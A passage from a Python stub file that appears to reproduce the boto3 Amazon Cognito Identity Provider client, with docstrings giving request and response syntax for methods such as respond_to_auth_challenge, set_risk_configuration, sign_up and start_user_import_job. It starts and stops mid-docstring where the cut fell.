::
response = client.list_users_in_group(
UserPoolId='string',
GroupName='string',
Limit=123,
NextToken='string'
)
**Response Syntax**
::
{
'Users': [
{
'Username': 'string',
'Attributes': [
{
'Name': 'string',
'Value': 'string'
},
],
'UserCreateDate': datetime(2015, 1, 1),
'UserLastModifiedDate': datetime(2015, 1, 1),
'Enabled': True|False,
'UserStatus': 'UNCONFIRMED'|'CONFIRMED'|'ARCHIVED'|'COMPROMISED'|'UNKNOWN'|'RESET_REQUIRED'|'FORCE_CHANGE_PASSWORD',
'MFAOptions': [
{
'DeliveryMedium': 'SMS'|'EMAIL',
'AttributeName': 'string'
},
]
},
],
'NextToken': 'string'
}
**Response Structure**
- *(dict) --*
- **Users** *(list) --*
The users returned in the request to list users.
- *(dict) --*
The user type.
- **Username** *(string) --*
The user name of the user you wish to describe.
- **Attributes** *(list) --*
A container with information about the user type attributes.
- *(dict) --*
Specifies whether the attribute is standard or custom.
- **Name** *(string) --*
The name of the attribute.
- **Value** *(string) --*
The value of the attribute.
- **UserCreateDate** *(datetime) --*
The creation date of the user.
- **UserLastModifiedDate** *(datetime) --*
The last modified date of the user.
- **Enabled** *(boolean) --*
Specifies whether the user is enabled.
- **UserStatus** *(string) --*
The user status. Can be one of the following:
* UNCONFIRMED - User has been created but not confirmed.
* CONFIRMED - User has been confirmed.
* ARCHIVED - User is no longer active.
* COMPROMISED - User is disabled due to a potential security threat.
* UNKNOWN - User status is not known.
* RESET_REQUIRED - User is confirmed, but the user must request a code and reset his or her password before he or she can sign in.
* FORCE_CHANGE_PASSWORD - The user is confirmed and the user can sign in using a temporary password, but on first sign-in, the user must change his or her password to a new value before doing anything else.
- **MFAOptions** *(list) --*
The MFA options for the user.
- *(dict) --*
Specifies the different settings for multi-factor authentication (MFA).
- **DeliveryMedium** *(string) --*
The delivery medium (email message or SMS message) to send the MFA code.
- **AttributeName** *(string) --*
The attribute name of the MFA option type.
- **NextToken** *(string) --*
An identifier that was returned from the previous call to this operation, which can be used to return the next set of items in the list.
:type UserPoolId: string
:param UserPoolId: **[REQUIRED]**
The user pool ID for the user pool.
:type GroupName: string
:param GroupName: **[REQUIRED]**
The name of the group.
:type Limit: integer
:param Limit:
The limit of the request to list users.
:type NextToken: string
:param NextToken:
An identifier that was returned from the previous call to this operation, which can be used to return the next set of items in the list.
:rtype: dict
:returns:
"""
pass
def resend_confirmation_code(self, ClientId: str, Username: str, SecretHash: str = None, UserContextData: Dict = None, AnalyticsMetadata: Dict = None) -> Dict:
"""
Resends the confirmation (for confirmation of registration) to a specific user in the user pool.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/ResendConfirmationCode>`_
**Request Syntax**
::
response = client.resend_confirmation_code(
ClientId='string',
SecretHash='string',
UserContextData={
'EncodedData': 'string'
},
Username='string',
AnalyticsMetadata={
'AnalyticsEndpointId': 'string'
}
)
**Response Syntax**
::
{
'CodeDeliveryDetails': {
'Destination': 'string',
'DeliveryMedium': 'SMS'|'EMAIL',
'AttributeName': 'string'
}
}
**Response Structure**
- *(dict) --*
The response from the server when the Amazon Cognito Your User Pools service makes the request to resend a confirmation code.
- **CodeDeliveryDetails** *(dict) --*
The code delivery details returned by the server in response to the request to resend the confirmation code.
- **Destination** *(string) --*
The destination for the code delivery details.
- **DeliveryMedium** *(string) --*
The delivery medium (email message or phone number).
- **AttributeName** *(string) --*
The attribute name.
:type ClientId: string
:param ClientId: **[REQUIRED]**
The ID of the client associated with the user pool.
:type SecretHash: string
:param SecretHash:
A keyed-hash message authentication code (HMAC) calculated using the secret key of a user pool client and username plus the client ID in the message.
:type UserContextData: dict
:param UserContextData:
Contextual data such as the user\'s device fingerprint, IP address, or location used for evaluating the risk of an unexpected event by Amazon Cognito advanced security.
- **EncodedData** *(string) --*
Contextual data such as the user\'s device fingerprint, IP address, or location used for evaluating the risk of an unexpected event by Amazon Cognito advanced security.
:type Username: string
:param Username: **[REQUIRED]**
The user name of the user to whom you wish to resend a confirmation code.
:type AnalyticsMetadata: dict
:param AnalyticsMetadata:
The Amazon Pinpoint analytics metadata for collecting metrics for ``ResendConfirmationCode`` calls.
- **AnalyticsEndpointId** *(string) --*
The endpoint ID.
:rtype: dict
:returns:
"""
pass
def respond_to_auth_challenge(self, ClientId: str, ChallengeName: str, Session: str = None, ChallengeResponses: Dict = None, AnalyticsMetadata: Dict = None, UserContextData: Dict = None) -> Dict:
"""
Responds to the authentication challenge.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/RespondToAuthChallenge>`_
**Request Syntax**
::
response = client.respond_to_auth_challenge(
ClientId='string',
ChallengeName='SMS_MFA'|'SOFTWARE_TOKEN_MFA'|'SELECT_MFA_TYPE'|'MFA_SETUP'|'PASSWORD_VERIFIER'|'CUSTOM_CHALLENGE'|'DEVICE_SRP_AUTH'|'DEVICE_PASSWORD_VERIFIER'|'ADMIN_NO_SRP_AUTH'|'NEW_PASSWORD_REQUIRED',
Session='string',
ChallengeResponses={
'string': 'string'
},
AnalyticsMetadata={
'AnalyticsEndpointId': 'string'
},
UserContextData={
'EncodedData': 'string'
}
)
**Response Syntax**
::
{
'ChallengeName': 'SMS_MFA'|'SOFTWARE_TOKEN_MFA'|'SELECT_MFA_TYPE'|'MFA_SETUP'|'PASSWORD_VERIFIER'|'CUSTOM_CHALLENGE'|'DEVICE_SRP_AUTH'|'DEVICE_PASSWORD_VERIFIER'|'ADMIN_NO_SRP_AUTH'|'NEW_PASSWORD_REQUIRED',
'Session': 'string',
'ChallengeParameters': {
'string': 'string'
},
'AuthenticationResult': {
'AccessToken': 'string',
'ExpiresIn': 123,
'TokenType': 'string',
'RefreshToken': 'string',
'IdToken': 'string',
'NewDeviceMetadata': {
'DeviceKey': 'string',
'DeviceGroupKey': 'string'
}
}
}
**Response Structure**
- *(dict) --*
The response to respond to the authentication challenge.
- **ChallengeName** *(string) --*
The challenge name. For more information, see .
- **Session** *(string) --*
The session which should be passed both ways in challenge-response calls to the service. If the or API call determines that the caller needs to go through another challenge, they return a session with other challenge parameters. This session should be passed as it is to the next ``RespondToAuthChallenge`` API call.
- **ChallengeParameters** *(dict) --*
The challenge parameters. For more information, see .
- *(string) --*
- *(string) --*
- **AuthenticationResult** *(dict) --*
The result returned by the server in response to the request to respond to the authentication challenge.
- **AccessToken** *(string) --*
The access token.
- **ExpiresIn** *(integer) --*
The expiration period of the authentication result in seconds.
- **TokenType** *(string) --*
The token type.
- **RefreshToken** *(string) --*
The refresh token.
- **IdToken** *(string) --*
The ID token.
- **NewDeviceMetadata** *(dict) --*
The new device metadata from an authentication result.
- **DeviceKey** *(string) --*
The device key.
- **DeviceGroupKey** *(string) --*
The device group key.
:type ClientId: string
:param ClientId: **[REQUIRED]**
The app client ID.
:type ChallengeName: string
:param ChallengeName: **[REQUIRED]**
The challenge name. For more information, see .
``ADMIN_NO_SRP_AUTH`` is not a valid value.
:type Session: string
:param Session:
The session which should be passed both ways in challenge-response calls to the service. If ``InitiateAuth`` or ``RespondToAuthChallenge`` API call determines that the caller needs to go through another challenge, they return a session with other challenge parameters. This session should be passed as it is to the next ``RespondToAuthChallenge`` API call.
:type ChallengeResponses: dict
:param ChallengeResponses:
The challenge responses. These are inputs corresponding to the value of ``ChallengeName`` , for example:
* ``SMS_MFA`` : ``SMS_MFA_CODE`` , ``USERNAME`` , ``SECRET_HASH`` (if app client is configured with client secret).
* ``PASSWORD_VERIFIER`` : ``PASSWORD_CLAIM_SIGNATURE`` , ``PASSWORD_CLAIM_SECRET_BLOCK`` , ``TIMESTAMP`` , ``USERNAME`` , ``SECRET_HASH`` (if app client is configured with client secret).
* ``NEW_PASSWORD_REQUIRED`` : ``NEW_PASSWORD`` , any other required attributes, ``USERNAME`` , ``SECRET_HASH`` (if app client is configured with client secret).
- *(string) --*
- *(string) --*
:type AnalyticsMetadata: dict
:param AnalyticsMetadata:
The Amazon Pinpoint analytics metadata for collecting metrics for ``RespondToAuthChallenge`` calls.
- **AnalyticsEndpointId** *(string) --*
The endpoint ID.
:type UserContextData: dict
:param UserContextData:
Contextual data such as the user\'s device fingerprint, IP address, or location used for evaluating the risk of an unexpected event by Amazon Cognito advanced security.
- **EncodedData** *(string) --*
Contextual data such as the user\'s device fingerprint, IP address, or location used for evaluating the risk of an unexpected event by Amazon Cognito advanced security.
:rtype: dict
:returns:
"""
pass
def set_risk_configuration(self, UserPoolId: str, ClientId: str = None, CompromisedCredentialsRiskConfiguration: Dict = None, AccountTakeoverRiskConfiguration: Dict = None, RiskExceptionConfiguration: Dict = None) -> Dict:
"""
Configures actions on detected risks. To delete the risk configuration for ``UserPoolId`` or ``ClientId`` , pass null values for all four configuration types.
To enable Amazon Cognito advanced security features, update the user pool to include the ``UserPoolAddOns`` key``AdvancedSecurityMode`` .
See .
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/SetRiskConfiguration>`_
**Request Syntax**
::
response = client.set_risk_configuration(
UserPoolId='string',
ClientId='string',
CompromisedCredentialsRiskConfiguration={
'EventFilter': [
'SIGN_IN'|'PASSWORD_CHANGE'|'SIGN_UP',
],
'Actions': {
'EventAction': 'BLOCK'|'NO_ACTION'
}
},
AccountTakeoverRiskConfiguration={
'NotifyConfiguration': {
'From': 'string',
'ReplyTo': 'string',
'SourceArn': 'string',
'BlockEmail': {
'Subject': 'string',
'HtmlBody': 'string',
'TextBody': 'string'
},
'NoActionEmail': {
'Subject': 'string',
'HtmlBody': 'string',
'TextBody': 'string'
},
'MfaEmail': {
'Subject': 'string',
'HtmlBody': 'string',
'TextBody': 'string'
}
},
'Actions': {
'LowAction': {
'Notify': True|False,
'EventAction': 'BLOCK'|'MFA_IF_CONFIGURED'|'MFA_REQUIRED'|'NO_ACTION'
},
'MediumAction': {
'Notify': True|False,
'EventAction': 'BLOCK'|'MFA_IF_CONFIGURED'|'MFA_REQUIRED'|'NO_ACTION'
},
'HighAction': {
'Notify': True|False,
'EventAction': 'BLOCK'|'MFA_IF_CONFIGURED'|'MFA_REQUIRED'|'NO_ACTION'
}
}
},
RiskExceptionConfiguration={
'BlockedIPRangeList': [
'string',
],
'SkippedIPRangeList': [
'string',
]
}
)
**Response Syntax**
::
{
'RiskConfiguration': {
'UserPoolId': 'string',
'ClientId': 'string',
'CompromisedCredentialsRiskConfiguration': {
'EventFilter': [
'SIGN_IN'|'PASSWORD_CHANGE'|'SIGN_UP',
],
'Actions': {
'EventAction': 'BLOCK'|'NO_ACTION'
}
},
'AccountTakeoverRiskConfiguration': {
'NotifyConfiguration': {
'From': 'string',
'ReplyTo': 'string',
'SourceArn': 'string',
'BlockEmail': {
'Subject': 'string',
'HtmlBody': 'string',
'TextBody': 'string'
},
'NoActionEmail': {
'Subject': 'string',
'HtmlBody': 'string',
'TextBody': 'string'
},
'MfaEmail': {
'Subject': 'string',
'HtmlBody': 'string',
'TextBody': 'string'
}
},
'Actions': {
'LowAction': {
'Notify': True|False,
'EventAction': 'BLOCK'|'MFA_IF_CONFIGURED'|'MFA_REQUIRED'|'NO_ACTION'
},
'MediumAction': {
'Notify': True|False,
'EventAction': 'BLOCK'|'MFA_IF_CONFIGURED'|'MFA_REQUIRED'|'NO_ACTION'
},
'HighAction': {
'Notify': True|False,
'EventAction': 'BLOCK'|'MFA_IF_CONFIGURED'|'MFA_REQUIRED'|'NO_ACTION'
}
}
},
'RiskExceptionConfiguration': {
'BlockedIPRangeList': [
'string',
],
'SkippedIPRangeList': [
'string',
]
},
'LastModifiedDate': datetime(2015, 1, 1)
}
}
**Response Structure**
- *(dict) --*
- **RiskConfiguration** *(dict) --*
The risk configuration.
- **UserPoolId** *(string) --*
The user pool ID.
- **ClientId** *(string) --*
The app client ID.
- **CompromisedCredentialsRiskConfiguration** *(dict) --*
The compromised credentials risk configuration object including the ``EventFilter`` and the ``EventAction``
- **EventFilter** *(list) --*
Perform the action for these events. The default is to perform all events if no event filter is specified.
- *(string) --*
- **Actions** *(dict) --*
The compromised credentials risk configuration actions.
- **EventAction** *(string) --*
The event action.
- **AccountTakeoverRiskConfiguration** *(dict) --*
The account takeover risk configuration object including the ``NotifyConfiguration`` object and ``Actions`` to take in the case of an account takeover.
- **NotifyConfiguration** *(dict) --*
The notify configuration used to construct email notifications.
- **From** *(string) --*
The email address that is sending the email. It must be either individually verified with Amazon SES, or from a domain that has been verified with Amazon SES.
- **ReplyTo** *(string) --*
The destination to which the receiver of an email should reply to.
- **SourceArn** *(string) --*
The Amazon Resource Name (ARN) of the identity that is associated with the sending authorization policy. It permits Amazon Cognito to send for the email address specified in the ``From`` parameter.
- **BlockEmail** *(dict) --*
Email template used when a detected risk event is blocked.
- **Subject** *(string) --*
The subject.
- **HtmlBody** *(string) --*
The HTML body.
- **TextBody** *(string) --*
The text body.
- **NoActionEmail** *(dict) --*
The email template used when a detected risk event is allowed.
- **Subject** *(string) --*
The subject.
- **HtmlBody** *(string) --*
The HTML body.
- **TextBody** *(string) --*
The text body.
- **MfaEmail** *(dict) --*
The MFA email template used when MFA is challenged as part of a detected risk.
- **Subject** *(string) --*
The subject.
- **HtmlBody** *(string) --*
The HTML body.
- **TextBody** *(string) --*
The text body.
- **Actions** *(dict) --*
Account takeover risk configuration actions
- **LowAction** *(dict) --*
Action to take for a low risk.
- **Notify** *(boolean) --*
Flag specifying whether to send a notification.
- **EventAction** *(string) --*
The event action.
* ``BLOCK`` Choosing this action will block the request.
* ``MFA_IF_CONFIGURED`` Throw MFA challenge if user has configured it, else allow the request.
* ``MFA_REQUIRED`` Throw MFA challenge if user has configured it, else block the request.
* ``NO_ACTION`` Allow the user sign-in.
- **MediumAction** *(dict) --*
Action to take for a medium risk.
- **Notify** *(boolean) --*
Flag specifying whether to send a notification.
- **EventAction** *(string) --*
The event action.
* ``BLOCK`` Choosing this action will block the request.
* ``MFA_IF_CONFIGURED`` Throw MFA challenge if user has configured it, else allow the request.
* ``MFA_REQUIRED`` Throw MFA challenge if user has configured it, else block the request.
* ``NO_ACTION`` Allow the user sign-in.
- **HighAction** *(dict) --*
Action to take for a high risk.
- **Notify** *(boolean) --*
Flag specifying whether to send a notification.
- **EventAction** *(string) --*
The event action.
* ``BLOCK`` Choosing this action will block the request.
* ``MFA_IF_CONFIGURED`` Throw MFA challenge if user has configured it, else allow the request.
* ``MFA_REQUIRED`` Throw MFA challenge if user has configured it, else block the request.
* ``NO_ACTION`` Allow the user sign-in.
- **RiskExceptionConfiguration** *(dict) --*
The configuration to override the risk decision.
- **BlockedIPRangeList** *(list) --*
Overrides the risk decision to always block the pre-authentication requests. The IP range is in CIDR notation: a compact representation of an IP address and its associated routing prefix.
- *(string) --*
- **SkippedIPRangeList** *(list) --*
Risk detection is not performed on the IP addresses in the range list. The IP range is in CIDR notation.
- *(string) --*
- **LastModifiedDate** *(datetime) --*
The last modified date.
:type UserPoolId: string
:param UserPoolId: **[REQUIRED]**
The user pool ID.
:type ClientId: string
:param ClientId:
The app client ID. If ``ClientId`` is null, then the risk configuration is mapped to ``userPoolId`` . When the client ID is null, the same risk configuration is applied to all the clients in the userPool.
Otherwise, ``ClientId`` is mapped to the client. When the client ID is not null, the user pool configuration is overridden and the risk configuration for the client is used instead.
:type CompromisedCredentialsRiskConfiguration: dict
:param CompromisedCredentialsRiskConfiguration:
The compromised credentials risk configuration.
- **EventFilter** *(list) --*
Perform the action for these events. The default is to perform all events if no event filter is specified.
- *(string) --*
- **Actions** *(dict) --* **[REQUIRED]**
The compromised credentials risk configuration actions.
- **EventAction** *(string) --* **[REQUIRED]**
The event action.
:type AccountTakeoverRiskConfiguration: dict
:param AccountTakeoverRiskConfiguration:
The account takeover risk configuration.
- **NotifyConfiguration** *(dict) --*
The notify configuration used to construct email notifications.
- **From** *(string) --*
The email address that is sending the email. It must be either individually verified with Amazon SES, or from a domain that has been verified with Amazon SES.
- **ReplyTo** *(string) --*
The destination to which the receiver of an email should reply to.
- **SourceArn** *(string) --* **[REQUIRED]**
The Amazon Resource Name (ARN) of the identity that is associated with the sending authorization policy. It permits Amazon Cognito to send for the email address specified in the ``From`` parameter.
- **BlockEmail** *(dict) --*
Email template used when a detected risk event is blocked.
- **Subject** *(string) --* **[REQUIRED]**
The subject.
- **HtmlBody** *(string) --*
The HTML body.
- **TextBody** *(string) --*
The text body.
- **NoActionEmail** *(dict) --*
The email template used when a detected risk event is allowed.
- **Subject** *(string) --* **[REQUIRED]**
The subject.
- **HtmlBody** *(string) --*
The HTML body.
- **TextBody** *(string) --*
The text body.
- **MfaEmail** *(dict) --*
The MFA email template used when MFA is challenged as part of a detected risk.
- **Subject** *(string) --* **[REQUIRED]**
The subject.
- **HtmlBody** *(string) --*
The HTML body.
- **TextBody** *(string) --*
The text body.
- **Actions** *(dict) --* **[REQUIRED]**
Account takeover risk configuration actions
- **LowAction** *(dict) --*
Action to take for a low risk.
- **Notify** *(boolean) --* **[REQUIRED]**
Flag specifying whether to send a notification.
- **EventAction** *(string) --* **[REQUIRED]**
The event action.
* ``BLOCK`` Choosing this action will block the request.
* ``MFA_IF_CONFIGURED`` Throw MFA challenge if user has configured it, else allow the request.
* ``MFA_REQUIRED`` Throw MFA challenge if user has configured it, else block the request.
* ``NO_ACTION`` Allow the user sign-in.
- **MediumAction** *(dict) --*
Action to take for a medium risk.
- **Notify** *(boolean) --* **[REQUIRED]**
Flag specifying whether to send a notification.
- **EventAction** *(string) --* **[REQUIRED]**
The event action.
* ``BLOCK`` Choosing this action will block the request.
* ``MFA_IF_CONFIGURED`` Throw MFA challenge if user has configured it, else allow the request.
* ``MFA_REQUIRED`` Throw MFA challenge if user has configured it, else block the request.
* ``NO_ACTION`` Allow the user sign-in.
- **HighAction** *(dict) --*
Action to take for a high risk.
- **Notify** *(boolean) --* **[REQUIRED]**
Flag specifying whether to send a notification.
- **EventAction** *(string) --* **[REQUIRED]**
The event action.
* ``BLOCK`` Choosing this action will block the request.
* ``MFA_IF_CONFIGURED`` Throw MFA challenge if user has configured it, else allow the request.
* ``MFA_REQUIRED`` Throw MFA challenge if user has configured it, else block the request.
* ``NO_ACTION`` Allow the user sign-in.
:type RiskExceptionConfiguration: dict
:param RiskExceptionConfiguration:
The configuration to override the risk decision.
- **BlockedIPRangeList** *(list) --*
Overrides the risk decision to always block the pre-authentication requests. The IP range is in CIDR notation: a compact representation of an IP address and its associated routing prefix.
- *(string) --*
- **SkippedIPRangeList** *(list) --*
Risk detection is not performed on the IP addresses in the range list. The IP range is in CIDR notation.
- *(string) --*
:rtype: dict
:returns:
"""
pass
def set_ui_customization(self, UserPoolId: str, ClientId: str = None, CSS: str = None, ImageFile: bytes = None) -> Dict:
"""
Sets the UI customization information for a user pool's built-in app UI.
You can specify app UI customization settings for a single client (with a specific ``clientId`` ) or for all clients (by setting the ``clientId`` to ``ALL`` ). If you specify ``ALL`` , the default configuration will be used for every client that has no UI customization set previously. If you specify UI customization settings for a particular client, it will no longer fall back to the ``ALL`` configuration.
.. note::
To use this API, your user pool must have a domain associated with it. Otherwise, there is no place to host the app's pages, and the service will throw an error.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/SetUICustomization>`_
**Request Syntax**
::
response = client.set_ui_customization(
UserPoolId='string',
ClientId='string',
CSS='string',
ImageFile=b'bytes'
)
**Response Syntax**
::
{
'UICustomization': {
'UserPoolId': 'string',
'ClientId': 'string',
'ImageUrl': 'string',
'CSS': 'string',
'CSSVersion': 'string',
'LastModifiedDate': datetime(2015, 1, 1),
'CreationDate': datetime(2015, 1, 1)
}
}
**Response Structure**
- *(dict) --*
- **UICustomization** *(dict) --*
The UI customization information.
- **UserPoolId** *(string) --*
The user pool ID for the user pool.
- **ClientId** *(string) --*
The client ID for the client app.
- **ImageUrl** *(string) --*
The logo image for the UI customization.
- **CSS** *(string) --*
The CSS values in the UI customization.
- **CSSVersion** *(string) --*
The CSS version number.
- **LastModifiedDate** *(datetime) --*
The last-modified date for the UI customization.
- **CreationDate** *(datetime) --*
The creation date for the UI customization.
:type UserPoolId: string
:param UserPoolId: **[REQUIRED]**
The user pool ID for the user pool.
:type ClientId: string
:param ClientId:
The client ID for the client app.
:type CSS: string
:param CSS:
The CSS values in the UI customization.
:type ImageFile: bytes
:param ImageFile:
The uploaded logo image for the UI customization.
:rtype: dict
:returns:
"""
pass
def set_user_mfa_preference(self, AccessToken: str, SMSMfaSettings: Dict = None, SoftwareTokenMfaSettings: Dict = None) -> Dict:
"""
Set the user's multi-factor authentication (MFA) method preference.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/SetUserMFAPreference>`_
**Request Syntax**
::
response = client.set_user_mfa_preference(
SMSMfaSettings={
'Enabled': True|False,
'PreferredMfa': True|False
},
SoftwareTokenMfaSettings={
'Enabled': True|False,
'PreferredMfa': True|False
},
AccessToken='string'
)
**Response Syntax**
::
{}
**Response Structure**
- *(dict) --*
:type SMSMfaSettings: dict
:param SMSMfaSettings:
The SMS text message multi-factor authentication (MFA) settings.
- **Enabled** *(boolean) --*
Specifies whether SMS text message MFA is enabled.
- **PreferredMfa** *(boolean) --*
The preferred MFA method.
:type SoftwareTokenMfaSettings: dict
:param SoftwareTokenMfaSettings:
The time-based one-time password software token MFA settings.
- **Enabled** *(boolean) --*
Specifies whether software token MFA is enabled.
- **PreferredMfa** *(boolean) --*
The preferred MFA method.
:type AccessToken: string
:param AccessToken: **[REQUIRED]**
The access token.
:rtype: dict
:returns:
"""
pass
def set_user_pool_mfa_config(self, UserPoolId: str, SmsMfaConfiguration: Dict = None, SoftwareTokenMfaConfiguration: Dict = None, MfaConfiguration: str = None) -> Dict:
"""
Set the user pool MFA configuration.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/SetUserPoolMfaConfig>`_
**Request Syntax**
::
response = client.set_user_pool_mfa_config(
UserPoolId='string',
SmsMfaConfiguration={
'SmsAuthenticationMessage': 'string',
'SmsConfiguration': {
'SnsCallerArn': 'string',
'ExternalId': 'string'
}
},
SoftwareTokenMfaConfiguration={
'Enabled': True|False
},
MfaConfiguration='OFF'|'ON'|'OPTIONAL'
)
**Response Syntax**
::
{
'SmsMfaConfiguration': {
'SmsAuthenticationMessage': 'string',
'SmsConfiguration': {
'SnsCallerArn': 'string',
'ExternalId': 'string'
}
},
'SoftwareTokenMfaConfiguration': {
'Enabled': True|False
},
'MfaConfiguration': 'OFF'|'ON'|'OPTIONAL'
}
**Response Structure**
- *(dict) --*
- **SmsMfaConfiguration** *(dict) --*
The SMS text message MFA configuration.
- **SmsAuthenticationMessage** *(string) --*
The SMS authentication message.
- **SmsConfiguration** *(dict) --*
The SMS configuration.
- **SnsCallerArn** *(string) --*
The Amazon Resource Name (ARN) of the Amazon Simple Notification Service (SNS) caller.
- **ExternalId** *(string) --*
The external ID.
- **SoftwareTokenMfaConfiguration** *(dict) --*
The software token MFA configuration.
- **Enabled** *(boolean) --*
Specifies whether software token MFA is enabled.
- **MfaConfiguration** *(string) --*
The MFA configuration.
:type UserPoolId: string
:param UserPoolId: **[REQUIRED]**
The user pool ID.
:type SmsMfaConfiguration: dict
:param SmsMfaConfiguration:
The SMS text message MFA configuration.
- **SmsAuthenticationMessage** *(string) --*
The SMS authentication message.
- **SmsConfiguration** *(dict) --*
The SMS configuration.
- **SnsCallerArn** *(string) --* **[REQUIRED]**
The Amazon Resource Name (ARN) of the Amazon Simple Notification Service (SNS) caller.
- **ExternalId** *(string) --*
The external ID.
:type SoftwareTokenMfaConfiguration: dict
:param SoftwareTokenMfaConfiguration:
The software token MFA configuration.
- **Enabled** *(boolean) --*
Specifies whether software token MFA is enabled.
:type MfaConfiguration: string
:param MfaConfiguration:
The MFA configuration.
:rtype: dict
:returns:
"""
pass
def set_user_settings(self, AccessToken: str, MFAOptions: List) -> Dict:
"""
Sets the user settings like multi-factor authentication (MFA). If MFA is to be removed for a particular attribute pass the attribute with code delivery as null. If null list is passed, all MFA options are removed.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/SetUserSettings>`_
**Request Syntax**
::
response = client.set_user_settings(
AccessToken='string',
MFAOptions=[
{
'DeliveryMedium': 'SMS'|'EMAIL',
'AttributeName': 'string'
},
]
)
**Response Syntax**
::
{}
**Response Structure**
- *(dict) --*
The response from the server for a set user settings request.
:type AccessToken: string
:param AccessToken: **[REQUIRED]**
The access token for the set user settings request.
:type MFAOptions: list
:param MFAOptions: **[REQUIRED]**
Specifies the options for MFA (e.g., email or phone number).
- *(dict) --*
Specifies the different settings for multi-factor authentication (MFA).
- **DeliveryMedium** *(string) --*
The delivery medium (email message or SMS message) to send the MFA code.
- **AttributeName** *(string) --*
The attribute name of the MFA option type.
:rtype: dict
:returns:
"""
pass
def sign_up(self, ClientId: str, Username: str, Password: str, SecretHash: str = None, UserAttributes: List = None, ValidationData: List = None, AnalyticsMetadata: Dict = None, UserContextData: Dict = None) -> Dict:
"""
Registers the user in the specified user pool and creates a user name, password, and user attributes.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/SignUp>`_
**Request Syntax**
::
response = client.sign_up(
ClientId='string',
SecretHash='string',
Username='string',
Password='string',
UserAttributes=[
{
'Name': 'string',
'Value': 'string'
},
],
ValidationData=[
{
'Name': 'string',
'Value': 'string'
},
],
AnalyticsMetadata={
'AnalyticsEndpointId': 'string'
},
UserContextData={
'EncodedData': 'string'
}
)
**Response Syntax**
::
{
'UserConfirmed': True|False,
'CodeDeliveryDetails': {
'Destination': 'string',
'DeliveryMedium': 'SMS'|'EMAIL',
'AttributeName': 'string'
},
'UserSub': 'string'
}
**Response Structure**
- *(dict) --*
The response from the server for a registration request.
- **UserConfirmed** *(boolean) --*
A response from the server indicating that a user registration has been confirmed.
- **CodeDeliveryDetails** *(dict) --*
The code delivery details returned by the server response to the user registration request.
- **Destination** *(string) --*
The destination for the code delivery details.
- **DeliveryMedium** *(string) --*
The delivery medium (email message or phone number).
- **AttributeName** *(string) --*
The attribute name.
- **UserSub** *(string) --*
The UUID of the authenticated user. This is not the same as ``username`` .
:type ClientId: string
:param ClientId: **[REQUIRED]**
The ID of the client associated with the user pool.
:type SecretHash: string
:param SecretHash:
A keyed-hash message authentication code (HMAC) calculated using the secret key of a user pool client and username plus the client ID in the message.
:type Username: string
:param Username: **[REQUIRED]**
The user name of the user you wish to register.
:type Password: string
:param Password: **[REQUIRED]**
The password of the user you wish to register.
:type UserAttributes: list
:param UserAttributes:
An array of name-value pairs representing user attributes.
For custom attributes, you must prepend the ``custom:`` prefix to the attribute name.
- *(dict) --*
Specifies whether the attribute is standard or custom.
- **Name** *(string) --* **[REQUIRED]**
The name of the attribute.
- **Value** *(string) --*
The value of the attribute.
:type ValidationData: list
:param ValidationData:
The validation data in the request to register a user.
- *(dict) --*
Specifies whether the attribute is standard or custom.
- **Name** *(string) --* **[REQUIRED]**
The name of the attribute.
- **Value** *(string) --*
The value of the attribute.
:type AnalyticsMetadata: dict
:param AnalyticsMetadata:
The Amazon Pinpoint analytics metadata for collecting metrics for ``SignUp`` calls.
- **AnalyticsEndpointId** *(string) --*
The endpoint ID.
:type UserContextData: dict
:param UserContextData:
Contextual data such as the user\'s device fingerprint, IP address, or location used for evaluating the risk of an unexpected event by Amazon Cognito advanced security.
- **EncodedData** *(string) --*
Contextual data such as the user\'s device fingerprint, IP address, or location used for evaluating the risk of an unexpected event by Amazon Cognito advanced security.
:rtype: dict
:returns:
"""
pass
def start_user_import_job(self, UserPoolId: str, JobId: str) -> Dict:
"""
Starts the user import.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/StartUserImportJob>`_
**Request Syntax**
::
response = client.start_user_import_job(
UserPoolId='string',
JobId='string'
)
**Response Syntax**
::
{
'UserImportJob': {
'JobName': 'string',
'JobId': 'string',
'UserPoolId': 'string',
'PreSignedUrl': 'string',
'CreationDate': datetime(2015, 1, 1),
'StartDate': datetime(2015, 1, 1),
'CompletionDate': datetime(2015, 1, 1),
'Status': 'Created'|'Pending'|'InProgress'|'Stopping'|'Expired'|'Stopped'|'Failed'|'Succeeded',
'CloudWatchLogsRoleArn': 'string',
'ImportedUsers': 123,
'SkippedUsers': 123,
'FailedUsers': 123,
'CompletionMessage': 'string'
}
}
**Response Structure**
- *(dict) --*
Represents the response from the server to the request to start the user import job.
- **UserImportJob** *(dict) --*
The job object that represents the user import job.
- **JobName** *(string) --*
The job name for the user import job.
- **JobId** *(string) --*
The job ID for the user import job.
- **UserPoolId** *(string) --*
The user pool ID for the user pool that the users are being imported into.
- **PreSignedUrl** *(string) --*
The pre-signed URL to be used to upload the ``.csv`` file.
- **CreationDate** *(datetime) --*
The date the user import job was created.
- **StartDate** *(datetime) --*
The date when the user import job was started.
- **CompletionDate** *(datetime) --*
The date when the user import job was completed.
- **Status** *(string) --*
The status of the user import job. One of the following:
* ``Created`` - The job was created but not started.
* ``Pending`` - A transition state. You have started the job, but it has not begun importing users yet.
* ``InProgress`` - The job has started, and users are being imported.
* ``Stopping`` - You have stopped the job, but the job has not stopped importing users yet.
* ``Stopped`` - You have stopped the job, and the job has stopped importing users.
* ``Succeeded`` - The job has completed successfully.
* ``Failed`` - The job has stopped due to an error.
* ``Expired`` - You created a job, but did not start the job within 24-48 hours. All data associated with the job was deleted, and the job cannot be started.
- **CloudWatchLogsRoleArn** *(string) --*
The role ARN for the Amazon CloudWatch Logging role for the user import job. For more information, see "Creating the CloudWatch Logs IAM Role" in the Amazon Cognito Developer Guide.
- **ImportedUsers** *(integer) --*
